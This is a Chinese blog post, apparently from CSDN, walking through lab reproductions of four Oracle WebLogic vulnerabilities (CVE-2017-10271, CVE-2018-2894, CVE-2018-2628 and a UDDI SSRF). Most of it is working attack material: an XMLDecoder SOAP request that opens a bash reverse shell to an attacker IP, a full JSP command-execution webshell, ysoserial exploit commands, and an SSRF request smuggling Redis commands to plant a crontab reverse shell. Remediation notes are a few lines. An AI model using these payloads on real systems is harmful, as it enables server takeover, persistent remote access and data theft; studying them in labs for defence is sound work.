中间件漏洞 -- Weblogic

最新推荐文章于 2024-05-12 08:34:48 发布
最新推荐文章于 2024-05-12 08:34:48 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 中间件 apache java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44769042/article/details/121406932
版权

中间件漏洞记录--6

目录

一、Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

1、环境搭建

2、访问

3、手工检验利用漏洞

1> 访问 http://ip:7001/wls-wsat/CoordinatorPortType

2> 抓一个上面那个包,并改成POST传参

3> 利用POST传参,构造XML 反弹shell 代码

4> 提前监听,getshell

5> 还可以写入文件

4、用工具

修复建议

二、Weblogic 任意文件上传漏洞(CVE-2018-2894)

1、环境搭建

2、访问 http://ip:7001/console,会跳转至登陆页面

3、执行 docker-compose logs | grep password

4、登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项

5、修改工作目录

6、然后点击安全 -> 增加,然后上传webshell

7、然后F12,搜 tc_background,有一个时间戳

8、然后访问,成功执行

​ 9、木马在此

三、Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

1、环境搭建

2、访问 /console,搭建成功

3、下载ysoserial-cve-2018-2628工具,并启动一个JRMP Server

4、 使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包

5、查看,命令执行成功

四、Weblogic SSRF漏洞

1、环境搭建

2、访问 /uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞

3、填写任意信息,search抓包

4、探测内网

5、注入HTTP头,利用Redis反弹shell

1> 首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)

2> 发送三条redis命令,将弹shell脚本写入/etc/crontab

3> 提前监听,getshell

修复建议

一、Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

1、环境搭建

docker + vulhub

cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d

2、访问

出现这个404,就说明搭建成功

3、手工检验利用漏洞

1> 访问 http://ip:7001/wls-wsat/CoordinatorPortType

出现如下页,则可能存在此漏洞

默认存在漏洞的url

/wls-wsat/CoordinatorPortType 
/wls-wsat/RegistrationPortTypeRPC 
/wls-wsat/ParticipantPortType 
/wls-wsat/RegistrationRequesterPortType 
/wls-wsat/CoordinatorPortType11 
/wls-wsat/RegistrationPortTypeRPC11 
/wls-wsat/ParticipantPortType11 
/wls-wsat/RegistrationRequesterPortType11

2> 抓一个上面那个包,并改成POST传参

3> 利用POST传参,构造XML 反弹shell 代码

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.129.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.129.225/1234 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

4> 提前监听,getshell

5> 还可以写入文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.129.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

4、用工具

直接可以检测,命令执行,上传

修复建议

  • 安装补丁。
  • 删除wls-wsat组件,再次访问返回404.

二、Weblogic 任意文件上传漏洞(CVE-2018-2894)

1、环境搭建

docker + vulhub

cd vulhub/weblogic/CVE-2018-2894
docker-compose up -d

2、访问 http://ip:7001/console,会跳转至登陆页面

3、执行 docker-compose logs | grep password

可以查看到用户名密码 weblogic Hzxon4k3

4、登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项

然后保存

5、修改工作目录

访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的

6、然后点击安全 -> 增加,然后上传webshell

 

7、然后F12,搜 tc_background,有一个时间戳

8、然后访问,成功执行

http://192.168.129.129:7001/ws_utc/css/config/keystore/1637242302425_shell.jsp
http://ip:7001/ws_utc/css/config/keystore/时间戳_上传的文件名

 9、木马在此

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
 else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

三、Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

ysoserial-cve-2018-2628,下载链接https://github.com/tdy218/ysoserial-cve-2018-2628/releases

expolit.py脚本,下载链接https://www.exploit-db.com/exploits/44553

1、环境搭建

docker + vulhub

cd vulhub/weblogic/CVE-2018-2628
docker-compose up -d

2、访问 /console,搭建成功

3、下载ysoserial-cve-2018-2628工具,并启动一个JRMP Server

java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener 1234 Jdk7u21 "touch /tmp/hello" 

java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [攻击机监听端口] jdk版本编号 "要执行的命令"

4、 使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包

python2 exploit.py 靶机IP 端口(默认7001) ysoserial-0.1-cve-2018-2628-all.jar的位置 攻击机IP 攻击机监听端口 JRMPClient

5、查看,命令执行成功

来到部署环境的靶机的那个目录下,执行 docker-compose exec weblogic bash

查看目录,命令执行成功,成功创建

四、Weblogic SSRF漏洞

1、环境搭建

docker + vulhub

cd vulhub/weblogic/ssrf
docker-compose up -d

2、访问 /uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞

3、填写任意信息,search抓包

并将其改为get类型

4、探测内网

参数operatorSSRF的可控参数,将其更改为开放的端口,如http://127.0.0.1:7001/,将返回error code

若端口未开放,则会返回 but could not connect over HTTP to server

通过 返回数据包 中的错误信息,即可探测内网状态。

5、注入HTTP头,利用Redis反弹shell

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

1> 首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)

docker ps -a
docker inspect redis的id值

最下面可以看到ip

探测是否开放

出现右边这句话,说明6379开放

2> 发送三条redis命令,将弹shell脚本写入/etc/crontab

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/ip/端口 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

将其进行url编码,加在6379后面,发包

GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.27.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.129.226%2F1234%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=abcd&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1
Host: 192.168.129.129:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://192.168.129.129:7001
Connection: close
Referer: http://192.168.129.129:7001/uddiexplorer/SearchPublicRegistries.jsp
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=HB0dhXTP4WZ1VGP9qGRkvYq25f0TnhZQPQ2Fy4hqc1JYhz8dnqzd!1867720999
Upgrade-Insecure-Requests: 1

3> 提前监听,getshell

修复建议

删除SearchPublicRegistries.jsp文件

木剑温小二丶
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic中间件漏洞汇总
混子
11-24 8843
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
关于weblogic的bea_wls_internal之error message on page漏洞的解决办法
东方郭的博客
05-09 4127
之前在做国网项目安全测试时候,被扫描出error message on page的漏洞,主要涉及的均为bea_wls_internal包下的文件,例如 error message on page漏洞为发现了可能泄露敏感信息的错误或警告消息。该消息还可能包含生成未处理异常的文件的位置; 对于该异常扫描工具提供的的解决办法为:验证此页面是否公开错误或警告消息,并正确配置应用程序以将错误记录到文...
深入浅出带你学习weblogic中间件常见漏洞
最新发布
qq_53058639的博客
05-12 825
WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。可以看到WEBLOGIC的作用还是非常大的,它的特点可以概括为下面五个点:1.标准性,支持多种标准。2.可扩展性,集群能力强。3.开发快,可以快速部署。4.灵活性强。5.可靠性强,安全性高。下面展开来讲weblogic中间件常见的漏洞以及利用方法。
poc weblogic 漏洞利用_weblogic漏洞利用汇总
weixin_39662228的博客
12-30 291
漏洞列表弱口令ssrf CVE-2014-4210WLS 组件远程代码执行 CVE-2017-10271任意上传 CVE-2018-2894weak passwd&&CVE-2018-2894weblogic 10.3.6(11g)登录地址:http://ip:7001/console/login/LoginForm.jsp默认口令:weblogicOracle@123CVE-20...
weblogic漏洞
weixin_44980626的博客
01-03 1321
删除修改时注意备份(包括文件的具体地址),测试时weblogic 不可以让非正常结束,否则 第二次无法正常启动 http://sn.cloud.ccb.com/bea_wls_internal/classes/META-INF/MANIFEST.MF 删除bea_wls_internal文件 替换所有bea_wls_internal.war包 这个bea_wls_internal.war是我重打的...
weblogic漏洞总结复现
1ance's blog
10-07 2367
title: weblogic漏洞总结复现 date: 2021-10-02 22:05:37 updated: tags: weblogic 中间件 漏洞 categories: 漏洞复现 keywords: description: top_img: cover: weblogic.jpg 简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用.
weblogic Java反序列化漏洞测试和解决
热门推荐
chaoloveyou的专栏
01-17 1万+
一、打补丁从weblogic10.3.6打补丁到10.3.6.0.12  系统是windows 2008 server 64位  查看服务器的weblogic版本信息:cmd下执行 java weblogic.version 显示信息如下: WebLogic Server 10.3.6.0 Tue Nov 15 08:52:36 PST 2011 1441050
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
weblogic12c 漏洞 CVE-2018-2628补丁
07-23
2018最新weblogic反序列化漏洞补丁包 CVE-2018-2628补丁
weblogic cmd命令漏洞检测
04-08
由于它们都是基于Java中间件,因此可能会共享相似的漏洞类型。攻击者可能会尝试在JBOSS上复用针对WebLogic攻击方法,尽管具体的技术细节可能有所不同。 为了检测WebLogic中的CMD命令漏洞,可以使用像`...
Weblogic补丁【2017-10-13】
01-09
Weblogic服务器作为广泛使用的中间件,其反序列化漏洞可能给企业带来重大安全风险,包括数据泄露、服务中断甚至整个系统的完全接管。 这个特定的补丁(HNIC.jar)很可能是Oracle针对该反序列化漏洞的修复程序。补丁...
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
s\base_domain
12-19
近在用weblogic,经常出现的问题就是找不到类或找不到方法,但是jar包明明就在classpath里面。经过研究发现原因为weblogic的调用过程中并未调用classpath下的jar,而是调用了其他的类,所以只需要将找不到类的jar加入的到weblogic的启动项中即可。加入启动项的步骤如下: 1.把jar包放到weblogic的domain的xfirelib\目录下(或其它目录均可) 2.修改bea\user_projects\domains\base_domain\bin下的setDomainEnv.cmd配置, set CLASSPATH=%PRE_CLASSPATH%;%WEBLOGIC_CLASSPATH%;%POST_CLASSPATH%;%WLP_POST_CLASSPATH% set DOMAIN_HOME=D:\bea\user_projects\domains\base_domain 这个是classpath的原本配置,勿动。 本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/niuxinlong/archive/2010/01/22/5224463.aspx
weblogic反序列化漏洞补丁
09-11
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
YouthBelief的博客
11-01 7718
weblogic wls-wsat组件远程命令执行(CVE-2017-3506) 前言 与weblogic 反序列化(CVE-2017-10271)类似 一般情况下weblogic会开放7001以及7002端口 0x01 漏洞描述 wls-wsat组件远程命令执行 如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞 /wls-wsat/CoordinatorPortType11 0x02 影响范围 OracleWebLogic Server10.3.6.
weblogic反序列化漏洞修复
事生谋,谋生计
01-04 592
漏洞验证 1.http://ip:端口/wls-wsat/CoordinatorPortType 2.http://ip:端口/_async/AsyncResponseServiceSoap12 如果页面能访问到,证明存在漏洞漏洞修复 解决方法:删除不安全文件 针对漏洞1,如下删除命令: find / -name wls-wsat* rm -rf `find / -name wls-wsat*` 针对漏洞2,如下删除命令: find /wls/bea -name bea_wls9* mv /wl
WebLogic XMLDecoder反序列化漏洞-CVE-2017-10271
m0_49025459的博客
06-05 386
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。漏洞url: http://:7001/wls-wsat/CoordinatorPortType通过构造SOAP(XML)格式的请求,在解析的过程中导致X...
Weblogic SSRF漏洞
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
weblogic学习视频
p3348577008的博客
12-16 1478
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值